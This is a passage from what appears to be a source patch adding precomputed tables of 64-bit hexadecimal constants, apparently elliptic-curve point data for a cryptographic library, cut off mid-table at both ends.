UINT64_C(0x94F42507A9D83E39) } }, ++ { { UINT64_C(0xBBE11CA8A55ADDE7), UINT64_C(0x39E6F5CF3BC0896B), ++ UINT64_C(0x1447314E1D2D8D94), UINT64_C(0x45B481255B012F8A), ++ UINT64_C(0x41AD23FA08AD5283), UINT64_C(0x837243E241D13774) }, ++ { UINT64_C(0x1FC0BD9DBADCAA46), UINT64_C(0x8DF164ED26E84CAE), ++ UINT64_C(0x8FF70EC041017176), UINT64_C(0x23AD4BCE5C848BA7), ++ UINT64_C(0x89246FDE97A19CBB), UINT64_C(0xA5EF987B78397991) } }, ++ { { UINT64_C(0x111AF1B74757964D), UINT64_C(0x1D25D351DDBBF258), ++ UINT64_C(0x4161E7767D2B06D6), UINT64_C(0x6EFD26911CAC0C5B), ++ UINT64_C(0x633B95DB211BFAEB), UINT64_C(0x9BEDFA5AE2BDF701) }, ++ { UINT64_C(0xADAC2B0B73E099C8), UINT64_C(0x436F0023BFB16BFF), ++ UINT64_C(0xB91B100230F55854), UINT64_C(0xAF6A2097F4C6C8B7), ++ UINT64_C(0x3FF65CED3AD7B3D9), UINT64_C(0x6FA2626F330E56DF) } }, ++ { { UINT64_C(0x3D28BF2DFFCCFD07), UINT64_C(0x0514F6FFD989603B), ++ UINT64_C(0xB95196295514787A), UINT64_C(0xA1848121C3DB4E9C), ++ UINT64_C(0x47FE2E392A3D4595), UINT64_C(0x506F5D8211B73ED4) }, ++ { UINT64_C(0xA2257AE7A600D8BB), UINT64_C(0xD659DBD10F9F122C), ++ UINT64_C(0xDB0FDC6764DF160F), UINT64_C(0xFF3793397CB19690), ++ UINT64_C(0xDF4366B898E72EC1), UINT64_C(0x97E72BECDF437EB8) } }, ++ { { UINT64_C(0x81DCEA271C81E5D9), UINT64_C(0x7E1B6CDA6717FC49), ++ UINT64_C(0xAA36B3B511EAE80D), UINT64_C(0x1306687C3CD7CBB3), ++ UINT64_C(0xED670235C4E89064), UINT64_C(0x9D3B000958A94760) }, ++ { UINT64_C(0x5A64E158E6A6333C), UINT64_C(0x1A8B4A3649453203), ++ UINT64_C(0xF1CAD7241F77CC21), UINT64_C(0x693EBB4B70518EF7), ++ UINT64_C(0xFB47BD810F39C91A), UINT64_C(0xCFE63DA2FA4BC64B) } }, ++ { { UINT64_C(0x82C1C684EAA66108), UINT64_C(0xE32262184CFE79FC), ++ UINT64_C(0x3F28B72B849C720E), UINT64_C(0x137FB3558FEE1CA8), ++ UINT64_C(0x4D18A9CDE4F90C4E), UINT64_C(0xC0344227CC3E46FA) }, ++ { UINT64_C(0x4FD5C08E79CDA392), UINT64_C(0x65DB20DB8ADC87B5), ++ UINT64_C(0x86F95D5B916C1B84), UINT64_C(0x7EDA387117BB2B7C), ++ UINT64_C(0x18CCF7E7669A533B), UINT64_C(0x5E92421CECAD0E06) } }, ++ { { UINT64_C(0x26063E124174B08B), UINT64_C(0xE621D9BE70DE8E4D), ++ UINT64_C(0xAEA0FD0F5ECDF350), UINT64_C(0x0D9F69E49C20E5C9), ++ UINT64_C(0xD3DADEB90BBE2918), UINT64_C(0xD7B9B5DB58AA2F71) }, ++ { UINT64_C(0x7A971DD73364CAF8), UINT64_C(0x702616A3C25D4BE4), ++ UINT64_C(0xA30F0FA1A9E30071), UINT64_C(0x98AB24385573BC69), ++ UINT64_C(0xCBC63CDF6FEC2E22), UINT64_C(0x965F90EDCC901B9B) } }, ++ { { UINT64_C(0xD53B592D71E15BB3), UINT64_C(0x1F03C0E98820E0D0), ++ UINT64_C(0xCE93947D3CCCB726), UINT64_C(0x2790FEE01D547590), ++ UINT64_C(0x4401D847C59CDD7A), UINT64_C(0x72D69120A926DD9D) }, ++ { UINT64_C(0x38B8F21D4229F289), UINT64_C(0x9F412E407FE978AF), ++ UINT64_C(0xAE07901BCDB59AF1), UINT64_C(0x1E6BE5EBD1D4715E), ++ UINT64_C(0x3715BD8B18C96BEF), UINT64_C(0x4B71F6E6E11B3798) } }, ++ }, ++ { ++ { { UINT64_C(0x11A8FDE5F0CE2DF4), UINT64_C(0xBC70CA3EFA8D26DF), ++ UINT64_C(0x6818C275C74DFE82), UINT64_C(0x2B0294AC38373A50), ++ UINT64_C(0x584C4061E8E5F88F), UINT64_C(0x1C05C1CA7342383A) }, ++ { UINT64_C(0x263895B3911430EC), UINT64_C(0xEF9B0032A5171453), ++ UINT64_C(0x144359DA84DA7F0C), UINT64_C(0x76E3095A924A09F2), ++ UINT64_C(0x612986E3D69AD835), UINT64_C(0x70E03ADA392122AF) } }, ++ { { UINT64_C(0xFEB707EE67AAD17B), UINT64_C(0xBB21B28783042995), ++ UINT64_C(0x26DE16459A0D32BA), UINT64_C(0x9A2FF38A1FFB9266), ++ UINT64_C(0x4E5AD96D8F578B4A), UINT64_C(0x26CC0655883E7443) }, ++ { UINT64_C(0x1D8EECAB2EE9367A), UINT64_C(0x42B84337881DE2F8), ++ UINT64_C(0xE49B2FAED758AE41), UINT64_C(0x6A9A22904A85D867), ++ UINT64_C(0x2FB89DCEE68CBA86), UINT64_C(0xBC2526357F09A982) } }, ++ { { UINT64_C(0xADC794368C61AAAC), UINT64_C(0x24C7FD135E926563), ++ UINT64_C(0xEF9FAAA40406C129), UINT64_C(0xF4E6388C8B658D3C), ++ UINT64_C(0x7262BEB41E435BAF), UINT64_C(0x3BF622CCFDAEAC99) }, ++ { UINT64_C(0xD359F7D84E1AEDDC), UINT64_C(0x05DC4F8CD78C17B7), ++ UINT64_C(0xB18CF03229498BA5), UINT64_C(0xC67388CA85BF35AD), ++ UINT64_C(0x8A7A6AA262AA4BC8), UINT64_C(0x0B8F458E72F4627A) } }, ++ { { UINT64_C(0x3FB812EEC68E4488), UINT64_C(0x53C5EAA460EF7281), ++ UINT64_C(0xE57241838FBEFBE4), UINT64_C(0x2B7D49F4A4B24A05), ++ UINT64_C(0x23B138D0710C0A43), UINT64_C(0x16A5B4C1A85EC1DB) }, ++ { UINT64_C(0x7CC1F3D7305FEB02), UINT64_C(0x52F7947D5B6C1B54), ++ UINT64_C(0x1BDA23128F56981C), UINT64_C(0x68663EAEB4080A01), ++ UINT64_C(0x8DD7BA7E9F999B7F), UINT64_C(0xD8768D19B686580C) } }, ++ { { UINT64_C(0xBCD0E0AD7AFDDA94), UINT64_C(0x95A0DBBE34A30687), ++ UINT64_C(0xBBE3C3DF8C5E2665), UINT64_C(0x742BECD8EBF2BC16), ++ UINT64_C(0x300CEB483FA163A6), UINT64_C(0x0C5D02EE4663354B) }, ++ { UINT64_C(0xE4FB9AD6B5E606A4), UINT64_C(0x93F507B8CF49FF95), ++ UINT64_C(0x9406A90C585C193B), UINT64_C(0xAD1440C14ECF9517), ++ UINT64_C(0x184CB4759CEA53F1), UINT64_C(0x6855C4748EF11302) } }, ++ { { UINT64_C(0x00ECB523EDCAFA52), UINT64_C(0x0DA0AE0E086F69D3), ++ UINT64_C(0xC384DE15C242F347), UINT64_C(0xFB050E6E848C12B7), ++ UINT64_C(0x22F6765464E015CE), UINT64_C(0xCBDC2A487CA122F2) }, ++ { UINT64_C(0xA940D973445FB02C), UINT64_C(0x00F31E783767D89D), ++ UINT64_C(0x2B65A237613DABDD), UINT64_C(0x2BE0AB05C875AE09), ++ UINT64_C(0xB22E54FDBA204F8E), UINT64_C(0x65E2029D0F7687B9) } }, ++ { { UINT64_C(0xFFD825381855A71C), UINT64_C(0x26A330B3438BD8D8), ++ UINT64_C(0x89628311F9D8C5F9), UINT64_C(0x8D5FB9CF953738A0), ++ UINT64_C(0xCB7159C9EDFCD4E5), UINT64_C(0xD64E52302064C7C2) }, ++ { UINT64_C(0xF858ED80689F3CFE), UINT64_C(0x4830E30956128B67), ++ UINT64_C(0x2E1692DAE0E90688), UINT64_C(0xAB818913CA9CC232), ++ UINT64_C(0xE2E30C23A5D229A6), UINT64_C(0xA544E8B10E740E23) } }, ++ { { UINT64_C(0x1C15E569DC61E6CC), UINT64_C(0x8FD7296758FC7800), ++ UINT64_C(0xE61E7DB737A9DFC5), UINT64_C(0x3F34A9C65AFD7822), ++ UINT64_C(0x0A11274219E80773), UINT64_C(0xA353460C4760FC58) }, ++ { UINT64_C(0x2FB7DEEBB3124C71), UINT64_C(0x484636272D4009CC), ++ UINT64_C(0x399D1933C3A10370), UINT64_C(0x7EB1945054388DBD), ++ UINT64_C(0x8ECCE6397C2A006A), UINT64_C(0x3D565DAF55C932A0) } }, ++ { { UINT64_C(0xCEF57A9FD9ADAE53), UINT64_C(0xE2EB27D7F83FD8CD), ++ UINT64_C(0x4AC8F7199BBD2DDE), UINT64_C(0x604283AAE91ABFB7), ++ UINT64_C(0xB6A4E11534799F87), UINT64_C(0x2B253224E4C2A8F3) }, ++ { UINT64_C(0xC34F8B92C8782294), UINT64_C(0xC74D697DFCC2CB6B), ++ UINT64_C(0xD990411BC2C84C46), UINT64_C(0x2807B5C631EA4955), ++ UINT64_C(0x14AE2B93B9EB27F5), UINT64_C(0xF0AE96A76163EDFA) } }, ++ { { UINT64_C(0xA7BDCBB442DB7180), UINT64_C(0xC9FAA41FEDCA752F), ++ UINT64_C(0x147F91B4E820F401), UINT64_C(0x1E6CEF86F5F2645F), ++ UINT64_C(0xB4AB4D7F31FE711D), UINT64_C(0xCE68FB3C743EF882) }, ++ { UINT64_C(0xB9D7D6823EF2FCFF), UINT64_C(0xF6893811020DCAFD), ++ UINT64_C(0x30D9A50CBF81E760), UINT64_C(0x7F247D06B9B87228), ++ UINT64_C(0x143D4FEC5F40CFC0), UINT64_C(0x21D78D73329B2A88) } }, ++ { { UINT64_C(0x06B3FF8AED3F2055), UINT64_C(0x50482C77522BE214), ++ UINT64_C(0x8DF69CD8DDF54620), UINT64_C(0x6D1DB204F78A1165), ++ UINT64_C(0x459AE4A29AFE6BF2), UINT64_C(0xC23A9FFD24AC871E) }, ++ { UINT64_C(0xB7FD22E389E85D81), UINT64_C(0x297F1F6B122E9978), ++ UINT64_C(0xAB283D66144BE1CE), UINT64_C(0xC1F90AC2C00C614E), ++ UINT64_C(0x5465576E3224CD09), UINT64_C(0x8E8D910D441B6059) } }, ++ { { UINT64_C(0xF73A060AAAA228BC), UINT64_C(0xCF1B078356EFF87D), ++ UINT64_C(0x11EF17C0A54C9133), UINT64_C(0x9E476B1576A4DAA5), ++ UINT64_C(0x5624FEAC8018FB92), UINT64_C(0x9826A0FCCFEEC1B9) }, ++ { UINT64_C(0xB732F7FE2DFE2046), UINT64_C(0x9260BD9F3B40DA6A), ++ UINT64_C(0xCC9F908F4F231773), UINT64_C(0x4827FEB9DAFC0D55), ++ UINT64_C(0x07D32E85538ACE95), UINT64_C(0xAD9F897CB8EDAF37) } }, ++ { { UINT64_C(0x2F75B82FE3415498), UINT64_C(0xF99CAC5FF1015F30), ++ UINT64_C(0x766408247D7F25DE), UINT64_C(0x714BC9CDEE74C047), ++ UINT64_C(0x70F847BF07448879), UINT64_C(0xA14481DE072165C0) }, ++ { UINT64_C(0x9BFA59E3DB1140A8), UINT64_C(0x7B9C7FF0FCD13502), ++ UINT64_C(0xF4D7538E68459ABF), UINT64_C(0xED93A791C8FC6AD2), ++ UINT64_C(0xA8BBE2A8B51BD9B2), UINT64_C(0x084B5A279FB34008) } }, ++ { { UINT64_C(0xB3BB9545EB138C84), UINT64_C(0x59C3489C3FC88BFD), ++ UINT64_C(0x3A97FF6385F53EC7), UINT64_C(0x40FDF5A60AA69C3D), ++ UINT64_C(0x0E8CCEC753D19668), UINT64_C(0x0AA72EF933FAA661) }, ++ { UINT64_C(0xF5C5A6CF9B1E684B), UINT64_C(0x630F937131A22EA1), ++ UINT64_C(0x06B2AAC2AC60F7EA), UINT64_C(0xB181CAE25BC37D80), ++ UINT64_C(0x4601A929247B13EA), UINT64_C(0x8A71C3865F739797) } }, ++ { { UINT64_C(0x545387B3AB134786), UINT64_C(0x3179BB061599B64A), ++ UINT64_C(0xB0A6198607593574), UINT64_C(0xC7E39B2163FA7C3B), ++ UINT64_C(0xA1173F8691585D13), UINT64_C(0x09D5CC8ECB9525CD) }, ++ { UINT64_C(0xAAD44FFD8F3A3451), UINT64_C(0x702B04F225820CC5), ++ UINT64_C(0xE90CAC491CB66C17), UINT64_C(0x40F6B547EE161DC4), ++ UINT64_C(0xC08BB8B41BA4AC4E), UINT64_C(0x7DC064FBAE5A6BC1) } }, ++ { { UINT64_C(0x90A5E8719D76DDC7), UINT64_C(0x39DC8FAEEDFC8E2E), ++ UINT64_C(0x98467A235B079C62), UINT64_C(0xE25E378505450C98), ++ UINT64_C(0x2FE23A4D96140083), UINT64_C(0x65CE3B9AE9900312) }, ++ { UINT64_C(0x1D87D0886B72B5D9), UINT64_C(0x72F53220FD9AFC82), ++ UINT64_C(0xC63C7C159E1F71FA), UINT64_C(0x90DF26EA8D449637), ++ UINT64_C(0x97089F40C1C2B215), UINT64_C(0x83AF266442317FAA) } }, ++ }, ++ { ++ { { UINT64_C(0xFA2DB51A8D688E31), UINT64_C(0x225B696CA09C88D4), ++ UINT64_C(0x9F88AF1D6059171F), UINT64_C(0x1C5FEA5E782A0993), ++ UINT64_C(0xE0FB15884EC710D3), UINT64_C(0xFAF372E5D32CE365) }, ++ { UINT64_C(0xD9F896AB26506F45), UINT64_C(0x8D3503388373C724), ++ UINT64_C(0x1B76992DCA6E7342), UINT64_C(0x76338FCA6FD0C08B), ++ UINT64_C(0xC3EA4C65A00F5C23), UINT64_C(0xDFAB29B3B316B35B) } }, ++ { { UINT64_C(0x84E5541F483AEBF9), UINT64_C(0x8ADFF7DC49165772), ++ UINT64_C(0xE0A43AD69BEAAD3C), UINT64_C(0x97DD1820F51C2714), ++ UINT64_C(0xAC2B4CB457EA5B0C), UINT64_C(0x87DBD011D11767CA) }, ++ { UINT64_C(0x18CCF36CBFC7957A), UINT64_C(0xD4A088411BC79227), ++ UINT64_C(0x9811CE43D8D292A8), UINT64_C(0x72C5FC68D58C4EE7), ++ UINT64_C(0x5BC0F0BED35C65A7), UINT64_C(0x0B446DBCCBBF9669) } }, ++ { { UINT64_C(0x7EBA3DA69CEE9BCE), UINT64_C(0x3E2C1248D5377750), ++ UINT64_C(0x8C917D982B93D8B2), UINT64_C(0xCA8FC6AC7CAD1F75), ++ UINT64_C(0x5F581F19A0FF150A), UINT64_C(0x872CC14AE08327FA) }, ++ { UINT64_C(0xC774F187E9333188), UINT64_C(0x528ED4AC497AF7E8), ++ UINT64_C(0xCE036E9B8AD72B10), UINT64_C(0x463F9EBB917986CF), ++ UINT64_C(0xBE5163281325CF9B), UINT64_C(0xD28D5C50DD7E5FEA) } }, ++ { { UINT64_C(0x714C1D1BDD58BBE3), UINT64_C(0x85BA01AE039AFD0F), ++ UINT64_C(0x7F23EA3A6951AC80), UINT64_C(0x5C599290AC00C837), ++ UINT64_C(0xF6EFA2B3BF24CC1B), UINT64_C(0x393D8E421E84462B) }, ++ { UINT64_C(0x9BDA627DF8B89453), UINT64_C(0xE66FFF2EB23E0D1B), ++ UINT64_C(0xD1EE7089C3B94EC2), UINT64_C(0xF75DBA6E3031699A), ++ UINT64_C(0x8FF75F79242B2453), UINT64_C(0xE721EDEB289BFED4) } }, ++ { { UINT64_C(0x083215A1C1390FA8), UINT64_C(0x901D686A6DCE8CE0), ++ UINT64_C(0x4AB1BA62837073FF), UINT64_C(0x10C287AA34BEABA5), ++ UINT64_C(0xB4931AF446985239), UINT64_C(0x07639899B053C4DC) }, ++ { UINT64_C(0x29E7F44DE721EECD), UINT64_C(0x6581718257B3FF48), ++ UINT64_C(0x198542E25054E2E0), UINT64_C(0x923C9E1584616DE8), ++ UINT64_C(0x2A9C15E1AD465BB9), UINT64_C(0xD8D4EFC716319245) } }, ++ { { UINT64_C(0x72DC79439961A674), UINT64_C(0x839A0A52A0E13668), ++ UINT64_C(0xD7A53FA9334945EA), UINT64_C(0xDB21DB77E7AA25DB), ++ UINT64_C(0xB6675A7D66E96DA3), UINT64_C(0x2C31C406E66F33C0) }, ++ { UINT64_C(0x45020B626EC7B9CB), UINT64_C(0xFF46E9CD0391F267), ++ UINT64_C(0x7DABD7440FA2F221), UINT64_C(0x9A32364B9D4A2A3E), ++ UINT64_C(0xF0F84AE852D2E47A), UINT64_C(0xD0B872BB888F488A) } }, ++ { { UINT64_C(0x531E4CEFC9790EEF), UINT64_C(0xF7B5735E2B8D1A58), ++ UINT64_C(0xB8882F1EEF568511), UINT64_C(0xAFB08D1C86A86DB3), ++ UINT64_C(0x88CB9DF2F54DE8C7), UINT64_C(0xA44234F19A683282) }, ++ { UINT64_C(0xBC1B3D3AA6E9AB2E), UINT64_C(0xEFA071FB87FC99EE), ++ UINT64_C(0xFA3C737DA102DC0F), UINT64_C(0xDF3248A6D6A0CBD2), ++ UINT64_C(0x6E62A4FF1ECC1BF4), UINT64_C(0xF718F940C8F1BC17) } }, ++ { { UINT64_C(0x2C8B0AAD4F63F026), UINT64_C(0x2AFF623850B253CC), ++ UINT64_C(0xCAB3E94210C4D122), UINT64_C(0x52B59F0407CD2816), ++ UINT64_C(0x22322803982C41FC), UINT64_C(0x38844E668CF50B19) }, ++ { UINT64_C(0x42A959F7BE3264CD), UINT64_C(0xBDDC24BD6C983524), ++ UINT64_C(0xA489EB0C462B8640), UINT64_C(0xB7C0509298029BE7), ++ UINT64_C(0xD5546B5FA1ADDC64), UINT64_C(0xE7CAC1FCA0C655AF) } }, ++ { { UINT64_C(0x1454719847636F97), UINT64_C(0x6FA67481EBCDCCFF), ++ UINT64_C(0xC164872F395D3258), UINT64_C(0xB8CECAFEEE6ACDBC), ++ UINT64_C(0x3FBFE5F3A933F180), UINT64_C(0xEC20CAC2898C3B1E) }, ++ { UINT64_C(0x6A031BEE87DA73F9), UINT64_C(0xD1E667D15C5AF46E), ++ UINT64_C(0xCB3DC1681DC6EEF9), UINT64_C(0x2DD1BD9433D310C0), ++ UINT64_C(0x0F78D4939207E438), UINT64_C(0xC233D544A99C0E75) } }, ++ { { UINT64_C(0x228F19F19E2A0113), UINT64_C(0x58495BE50E1A5D37), ++ UINT64_C(0x97E08F6938D7F364), UINT64_C(0x1EC3BA3E510759B0), ++ UINT64_C(0x3682F19AE03CD40D), UINT64_C(0xC87745D8F9E16D68) }, ++ { UINT64_C(0xFD527AB509A642EA), UINT64_C(0x6308EEBDF9C81F27), ++ UINT64_C(0xFA9F666C550C5D68), UINT64_C(0xDEBA436F584AB153), ++ UINT64_C(0x1D4861D35B63E939), UINT64_C(0x073BED9BC9850221) } }, ++ { { UINT64_C(0x802BCCF08B171246), UINT64_C(0xFFF7D15A733B072F), ++ UINT64_C(0xEA3862664CBFA4EF), UINT64_C(0x9E5B5073D635946B), ++ UINT64_C(0x16E9A979FA81BE95), UINT64_C(0x41E8716EB14F701F) }, ++ { UINT64_C(0x25782E0F101A6719), UINT64_C(0x442C4875C9D66959), ++ UINT64_C(0x52D845D92B85D153), UINT64_C(0xFF9251382E831117), ++ UINT64_C(0x01B700CC8E02434B), UINT64_C(0xD2DB7F8EEC0BAE3E) } }, ++ { { UINT64_C(0x1B225300966A4872), UINT64_C(0x40C149BE566F537B), ++ UINT64_C(0x3335F4D2CB680021), UINT64_C(0x773D0263778E5F5F), ++ UINT64_C(0x1D9B7602666FA9ED), UINT64_C(0x52490A102E6200CF) }, ++ { UINT64_C(0x8434C7DD961F290B), UINT64_C(0x773AC15664456446), ++ UINT64_C(0x5E2BB78947B712BB), UINT64_C(0xFD3BCBFDBE0974AD), ++ UINT64_C(0x71AE9351791AD5D8), UINT64_C(0x1EE738BA6F4E1400) } }, ++ { { UINT64_C(0x2FA428AB0BE8E26E), UINT64_C(0xFEFF0600BB4CF9FC), ++ UINT64_C(0x76F25CA9B2EA5FB0), UINT64_C(0xAB7FECF06835C5F4), ++ UINT64_C(0x649D077219D5F328), UINT64_C(0xABE7B895ACBCB12E) }, ++ { UINT64_C(0xF2D1031AD69B1EA8), UINT64_C(0x46065D5DC60B0BBB), ++ UINT64_C(0xB0908DC185D798FF), UINT64_C(0x4E2420F0D2C9B18A), ++ UINT64_C(0x6B3A9BDDD30432A2), UINT64_C(0x501C3383C9B134AD) } }, ++ { { UINT64_C(0x608F096798A21284), UINT64_C(0x5361BE86059CCEDE), ++ UINT64_C(0x3A40655CAFD87EF7), UINT64_C(0x03CF311759083AA2), ++ UINT64_C(0x57DB5F61B6C366D9), UINT64_C(0x29DC275B6DD0D232) }, ++ { UINT64_C(0xBDAB24DD8FA67501), UINT64_C(0x5928F77565D08C37), ++ UINT64_C(0x9448A856645D466A), UINT64_C(0x6E6B5E2EC0E927A5), ++ UINT64_C(0xE884D546E80C6871), UINT64_C(0x10C881C953A9A851) } }, ++ { { UINT64_C(0x355053749B627AA5), UINT64_C(0xE7CA1B577976677B), ++ UINT64_C(0x812397124976CE17), UINT64_C(0x96E9080B96DA31B9), ++ UINT64_C(0x458254ABCC64AA1F), UINT64_C(0xFEFF682148E674C9) }, ++ { UINT64_C(0x8772F37A021F1488), UINT64_C(0x2E274E18AB56345C), ++ UINT64_C(0x7C7BE61C29823B76), UINT64_C(0x275DB7B29EEFB39E), ++ UINT64_C(0x83B10ED4BF5CBCEF), UINT64_C(0x40D7F5B4518E5183) } }, ++ { { UINT64_C(0x315CCC01F960B41B), UINT64_C(0x90B417C91D99E722), ++ UINT64_C(0x84AFAA0D013463E0), UINT64_C(0xF133C5D813E6D9E1), ++ UINT64_C(0xD95C6ADC525B7430), UINT64_C(0x082C61AD7A25106A) }, ++ { UINT64_C(0xABC1966DBA1CE179), UINT64_C(0xE0578B77A5DB529A), ++ UINT64_C(0x10988C05EC84107D), UINT64_C(0xFCADE5D71B207F83), ++ UINT64_C(0x0BEB6FDBC5BA83DB), UINT64_C(0x1C39B86D57537E34) } }, ++ }, ++ { ++ { { UINT64_C(0x5B0B5D692A7AECED), UINT64_C(0x4C03450C01DC545F), ++ UINT64_C(0x72AD0A4A404A3458), UINT64_C(0x1DE8E2559F467B60), ++ UINT64_C(0xA4B3570590634809), UINT64_C(0x76F30205706F0178) }, ++ { UINT64_C(0x588D21AB4454F0E5), UINT64_C(0xD22DF54964134928), ++ UINT64_C(0xF4E7E73D241BCD90), UINT64_C(0xB8D8A1D22FACC7CC), ++ UINT64_C(0x483C35A71D25D2A0), UINT64_C(0x7F8D25451EF9F608) } }, ++ { { UINT64_C(0xCB51F03954EBC926), UINT64_C(0xE235D356B8D4A7BB), ++ UINT64_C(0x93C8FAFAB41FE1A6), UINT64_C(0x6297701DA719F254), ++ UINT64_C(0x6E9165BC644F5CDE), UINT64_C(0x6506329D0C11C542) }, ++ { UINT64_C(0xA2564809A92B4250), UINT64_C(0x0E9AC173889C2E3E), ++ UINT64_C(0x286A592622B1D1BE), UINT64_C(0x86A3D7526ECDD041), ++ UINT64_C(0x4B867E0A649F9524), UINT64_C(0x1FE7D95A0629CB0F) } }, ++ { { UINT64_C(0xF4F66843CA5BAF54), UINT64_C(0x298DB357EFE7DB78), ++ UINT64_C(0xF607E86E7365712F), UINT64_C(0xD58822988A822BC0), ++ UINT64_C(0x2CFBD63AC61299B3), UINT64_C(0x6F713D9B67167B1A) }, ++ { UINT64_C(0x750F673FDE0B077A), UINT64_C(0x07482708EE2178DA), ++ UINT64_C(0x5E6D5BD169123C75), UINT64_C(0x6A93D1B6EAB99B37), ++ UINT64_C(0x6EF4F7E68CAEC6A3), UINT64_C(0x7BE411D6CF3ED818) } }, ++ { { UINT64_C(0xF92B307363A0A7D2), UINT64_C(0x32DA431C881DC8CF), ++ UINT64_C(0xE51BD5EDC578E3A3), UINT64_C(0xEFDA70D29587FA22), ++ UINT64_C(0xCFEC17089B2EBA85), UINT64_C(0x6AB51A4BAF7BA530) }, ++ { UINT64_C(0x5AC155AE98174812), UINT64_C(0xCAF07A71CCB076E3), ++ UINT64_C(0x280E86C2C38718A7), UINT64_C(0x9D12DE73D63745B7), ++ UINT64_C(0x0E8EA855BF8A79AA), UINT64_C(0x5EB2BED8BD705BF7) } }, ++ { { UINT64_C(0x33FE9578AE16DE53), UINT64_C(0x3AE85EB510BEC902), ++ UINT64_C(0xC4F4965844AF850E), UINT64_C(0x6EA222B3087DD658), ++ UINT64_C(0xB255E6FDA51F1447), UINT64_C(0xB35E4997117E3F48) }, ++ { UINT64_C(0x562E813B05616CA1), UINT64_C(0xDF5925D68A61E156), ++ UINT64_C(0xB2FA8125571C728B), UINT64_C(0x00864805A2F2D1CF), ++ UINT64_C(0x2DC26F411BCCB6FF), UINT64_C(0xEBD5E09363AE37DD) } }, ++ { { UINT64_C(0xD2D68BB30A285611), UINT64_C(0x3EAE7596DC8378F2), ++ UINT64_C(0x2DC6CCC66CC688A3), UINT64_C(0xC45E5713011F5DFB), ++ UINT64_C(0x6B9C4F6C62D34487), UINT64_C(0xFAD6F0771FC65551) }, ++ { UINT64_C(0x5E3266E062B23B52), UINT64_C(0xF1DAF319E98F4715), ++ UINT64_C(0x064D12EA3ED0AE83), UINT64_C(0x5CCF9326564125CB), ++ UINT64_C(0x09057022C63C1E9F), UINT64_C(0x7171972CDC9B5D2E) } }, ++ { { UINT64_C(0x2364FD9AEABD21B2), UINT64_C(0x3CE5F4BB9174AD6D), ++ UINT64_C(0xA4D6D5D0B38688C0), UINT64_C(0x2292A2D26D87FD7D), ++ UINT64_C(0x2A7D1B534CA02E54), UINT64_C(0x7BEE6E7EB4185715) }, ++ { UINT64_C(0x73E546098FC63ACD), UINT64_C(0xF4D93A124064E09D), ++ UINT64_C(0xD20E157A2B92DAA5), UINT64_C(0x90D125DBC4B81A00), ++ UINT64_C(0xCB951C9E7682DE13), UINT64_C(0x1ABE58F427987545) } }, ++ { { UINT64_C(0x6D35164030C70C8D), UINT64_C(0x8047D811CE2361B8), ++ UINT64_C(0x3F8B3D4FDF8E2C81), UINT64_C(0x5D59547733FA1F6C), ++ UINT64_C(0xF769FE5AE29B8A91), UINT64_C(0x26F0E606D737B2A2) }, ++ { UINT64_C(0x70CBFA5DB8B31C6A), UINT64_C(0x0F883B4A863D3AEA), ++ UINT64_C(0x156A4479E386AE2F), UINT64_C(0xA17A2FCDADE8A684), ++ UINT64_C(0x78BDF958E2A7E335), UINT64_C(0xD1B4E6733B9E3041) } }, ++ { { UINT64_C(0x1EAF48EC449A6D11), UINT64_C(0x6B94B8E46D2FA7B9), ++ UINT64_C(0x1D75D269728E4C1B), UINT64_C(0x91123819DD304E2C), ++ UINT64_C(0x0B34CAE388804F4B), UINT64_C(0x2BA192FBC5495E9A) }, ++ { UINT64_C(0xC93FF6EFFF4D24BF), UINT64_C(0xF8C2C0B00342BA78), ++ UINT64_C(0x8041F769831EB94C), UINT64_C(0x353100747782985E), ++ UINT64_C(0xC755320B3AF84E83), UINT64_C(0x384B6D266F497E7F) } }, ++ { { UINT64_C(0xEF92CD5917E6BD17), UINT64_C(0xA087305BA426965C), ++ UINT64_C(0x13895CE7AC47F773), UINT64_C(0xB85F2A9FE0BB2867), ++ UINT64_C(0x2926E6AA7CD7C58E), UINT64_C(0xE544EDA6450459C5) }, ++ { UINT64_C(0x73DBC351B90A9849), UINT64_C(0x961183F6848EBE86), ++ UINT64_C(0xC45BB21080534712), UINT64_C(0x379D08D7A654D9A3), ++ UINT64_C(0x5B97CEF2BD3FFA9C), UINT64_C(0x0F469F34DDC2FCE5) } }, ++ { { UINT64_C(0x6D1461080642F38D), UINT64_C(0x055171A0D21EB887), ++ UINT64_C(0x28DFFAB4D0DCEB28), UINT64_C(0x0D0E631298DE9CCD), ++ UINT64_C(0x750A9156118C3C3F), UINT64_C(0x8C1F1390B049D799) }, ++ { UINT64_C(0xE4823858439607C5), UINT64_C(0x947E9BA05C111EAB), ++ UINT64_C(0x39C95616A355DF2E), UINT64_C(0xF5F6B98E10E54BDA), ++ UINT64_C(0xB0E0B33D142B876A), UINT64_C(0x71197D73EA18C90C) } }, ++ { { UINT64_C(0x36A5139DF52BE819), UINT64_C(0xF60DDF3429A45D2B), ++ UINT64_C(0x0727EFECE9220E34), UINT64_C(0x431D33864EF7F446), ++ UINT64_C(0xC3165A64FCC4962C), UINT64_C(0xB7D926E1D64362BB) }, ++ { UINT64_C(0x216BC61FD45F9350), UINT64_C(0xA974CB2FBBAED815), ++ UINT64_C(0x31DF342D86FB2F76), UINT64_C(0x3AB67E0501D78314), ++ UINT64_C(0x7AA951E0DEE33ED2), UINT64_C(0x318FBBBDCEC78D94) } }, ++ { { UINT64_C(0xAD7EFB65B8FE0204), UINT64_C(0x0432E1C5230AB7F7), ++ UINT64_C(0x7563A62D9C967400), UINT64_C(0xD88B9C743524D4FF), ++ UINT64_C(0x16A1991CF1A823E3), UINT64_C(0xCF2F9BFEFA6F0FFB) }, ++ { UINT64_C(0x55AAA946A50CA61F), UINT64_C(0x8CBBD3C8FED4CAB3), ++ UINT64_C(0x03A0FAB87651365A), UINT64_C(0x46B5234B62DC3913), ++ UINT64_C(0xFD875B28B558CBBD), UINT64_C(0xA48EC3AE11CEB361) } }, ++ { { UINT64_C(0x5DD131A1B3ADBD8B), UINT64_C(0xF9FBCA3A29B45EF8), ++ UINT64_C(0x022048669341EE18), UINT64_C(0x8D13B89583BF9618), ++ UINT64_C(0x0E395BAEE807459C), UINT64_C(0xB9C110CCB190E7DB) }, ++ { UINT64_C(0xA0DC345225D25063), UINT64_C(0x2FB78EC802371462), ++ UINT64_C(0xC3A9E7BB8975C2D5), UINT64_C(0x9466687285A78264), ++ UINT64_C(0x480D2CC28029AA92), UINT64_C(0x237086C75655726D) } }, ++ { { UINT64_C(0x197F14BB65EB9EEE), UINT64_C(0xFC93125C9F12E5FD), ++ UINT64_C(0x9C20BC538BFBAE5E), UINT64_C(0xB35E21544BC053BA), ++ UINT64_C(0xE5FA9CC721C3898E), UINT64_C(0x502D72FFD42F950F) }, ++ { 